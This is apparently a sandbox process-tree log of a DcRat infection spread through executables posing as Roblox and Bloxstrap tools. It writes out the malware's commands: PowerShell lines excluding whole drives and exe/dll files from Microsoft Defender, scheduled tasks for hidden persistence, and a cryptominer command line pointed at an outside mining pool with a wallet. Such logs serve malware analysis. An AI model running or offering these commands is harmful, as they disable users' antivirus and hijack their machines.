                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5108
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2240
                                                • C:\Program Files\Internet Explorer\Registry.exe
                                                  "C:\Program Files\Internet Explorer\Registry.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:988
                                      • C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
                                        "C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
                                        2⤵
                                        • DcRat
                                        • Executes dropped EXE
                                        • Modifies registry class
                                        • Suspicious use of WriteProcessMemory
                                        PID:2756
                                        • C:\Windows\SysWOW64\WScript.exe
                                          "C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
                                          3⤵
                                            PID:4576
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "
                                              4⤵
                                                PID:1684
                                                • C:\winNet\ComContainerbrowserRefRuntime.exe
                                                  "C:\winNet/ComContainerbrowserRefRuntime.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Windows directory
                                                  • Modifies registry class
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5180
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VESsa4Q6e5.bat"
                                                    6⤵
                                                      PID:2948
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        7⤵
                                                          PID:3272
                                                        • C:\Windows\system32\w32tm.exe
                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          7⤵
                                                            PID:1856
                                                          • C:\Windows\LiveKernelReports\conhost.exe
                                                            "C:\Windows\LiveKernelReports\conhost.exe"
                                                            7⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                            PID:5764
                                                • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:976
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5868
                                                    • C:\Windows\System32\cmd.exe
                                                      "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                      4⤵
                                                        PID:5916
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5964
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:776
                                                      • C:\Windows\System32\cmd.exe
                                                        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                        4⤵
                                                          PID:6076
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"
                                                            5⤵
                                                            • DcRat
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:6116
                                                        • C:\Windows\System32\cmd.exe
                                                          "cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"
                                                          4⤵
                                                            PID:6136
                                                            • C:\Users\Admin\Bloxstrap.exe
                                                              C:\Users\Admin\Bloxstrap.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:568
                                                              • C:\Windows\System32\conhost.exe
                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"
                                                                6⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:3956
                                                                • C:\Windows\System32\cmd.exe
                                                                  "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
                                                                  7⤵
                                                                    PID:5692
                                                                    • C:\Windows\System32\Conhost.exe
                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      8⤵
                                                                        PID:5912
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                                                                        8⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:5792
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                        8⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        PID:4652
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:2064
                                                                      • C:\Windows\System32\conhost.exe
                                                                        "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                        8⤵
                                                                          PID:5992
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth
                                                                        7⤵
                                                                          PID:5960
                                                              • C:\Users\Admin\AppData\Local\Temp\Frage build.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Modifies registry class
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:1592
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
                                                                  3⤵
                                                                    PID:1236
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "
                                                                      4⤵
                                                                        PID:2304
                                                                        • C:\DriversavessessionDlldhcp\Roblox.exe
                                                                          "C:\DriversavessessionDlldhcp/Roblox.exe"
                                                                          5⤵
                                                                          • Modifies WinLogon for persistence
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Modifies registry class
                                                                          PID:4196
                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40szjpr3\40szjpr3.cmdline"
                                                                            6⤵
                                                                              PID:3328
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAAC.tmp" "c:\winNet\CSC2D3D11311BB1459C859E705AB2291E36.TMP"
                                                                                7⤵
                                                                                  PID:3540
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkt11ugp\nkt11ugp.cmdline"
                                                                                6⤵
                                                                                  PID:5276
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA6.tmp" "c:\Users\Default\SendTo\CSC298B554BE48545D7BEFA9E2BA0C5075.TMP"
                                                                                    7⤵
                                                                                      PID:5356
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crwrxth2\crwrxth2.cmdline"
                                                                                    6⤵
                                                                                      PID:132
                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC90.tmp" "c:\Program Files\Internet Explorer\CSC74179172C5254D7BA93F433CC1975B61.TMP"
                                                                                        7⤵
                                                                                          PID:5100
                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hyyii5l4\hyyii5l4.cmdline"
                                                                                        6⤵
                                                                                          PID:3416
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDA9.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSCE7785059AA1B4EE2B6E69A4DEAA7E1DF.TMP"
                                                                                            7⤵
                                                                                              PID:1224
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqdx0oev\yqdx0oev.cmdline"
                                                                                            6⤵
                                                                                              PID:5352
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFED2.tmp" "c:\winNet\CSCB210A7B3F9DB43EE896F5193545CE4F.TMP"
                                                                                                7⤵
                                                                                                  PID:5552
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ggmdvj0p\ggmdvj0p.cmdline"
                                                                                                6⤵
                                                                                                • Drops file in Windows directory
                                                                                                PID:1204
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFFEB.tmp" "c:\Windows\IdentityCRL\INT\CSCFB022689F64F454281863A9528E616A9.TMP"
                                                                                                  7⤵
                                                                                                    PID:4200
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqjigaoq\yqjigaoq.cmdline"
                                                                                                  6⤵
                                                                                                    PID:788
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7.tmp" "c:\Program Files\Java\jdk-1.8\include\win32\bridge\CSCCEEF9AE666D44A6AA9B3F0F2E3156C68.TMP"
                                                                                                      7⤵
                                                                                                        PID:5664
                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ymqbsffj\ymqbsffj.cmdline"
                                                                                                      6⤵
                                                                                                        PID:5688
                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B1.tmp" "c:\Program Files\Windows NT\TableTextService\en-US\CSCAC9DC3C362B842389DD27FC647DBA81.TMP"
                                                                                                          7⤵
                                                                                                            PID:5576
                                                                                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nbooucgh\nbooucgh.cmdline"
                                                                                                          6⤵
                                                                                                            PID:5512
                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES29B.tmp" "c:\winNet\CSC914BA3B3B01C4F879879E38F9C9BAD6.TMP"
                                                                                                              7⤵
                                                                                                                PID:5828
                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3tbqmpqn\3tbqmpqn.cmdline"
                                                                                                              6⤵
                                                                                                                PID:5728
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A8.tmp" "c:\Program Files\Microsoft Office\PackageManifests\CSCFD452B96B27B47E1B15A37F3D0011BC.TMP"
                                                                                                                  7⤵
                                                                                                                    PID:5848
                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0tly5dnr\0tly5dnr.cmdline"
                                                                                                                  6⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  PID:6040
                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74E.tmp" "c:\Windows\System32\CSC6EDE1823CE8C44998F71C1B5779EF3EF.TMP"
                                                                                                                    7⤵
                                                                                                                      PID:6084
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5160
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:2016
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Config.Msi/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:4048
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5140
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriversavessessionDlldhcp/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:4712
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5172
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5912
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5960
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5920
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5956
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:5924
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:3344
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:4864
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/winNet/'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:128
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msiexec.exe'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:1476
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\Roblox.exe'
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:1388
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\gyw7YfgZit.bat"
                                                                                                                    6⤵
                                                                                                                      PID:5552
                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                        chcp 65001
                                                                                                                        7⤵
                                                                                                                          PID:3672
                                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                          7⤵
                                                                                                                            PID:1384
                                                                                                                          • C:\Users\Admin\AppData\Local\msiexec.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\msiexec.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                            PID:5744
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\winNet\winlogon.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4832
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1916
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\winNet\winlogon.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2476
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1384
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2788
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 7 /tr "'C:\Users\Default\SendTo\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2276
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3740
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4520
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\Registry.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1440
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2320
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2800
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:1712
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\winNet\explorer.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4864
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2844
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\winNet\explorer.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:2556
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3572
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:988
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:4464
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Scheduled Task/Job: Scheduled Task
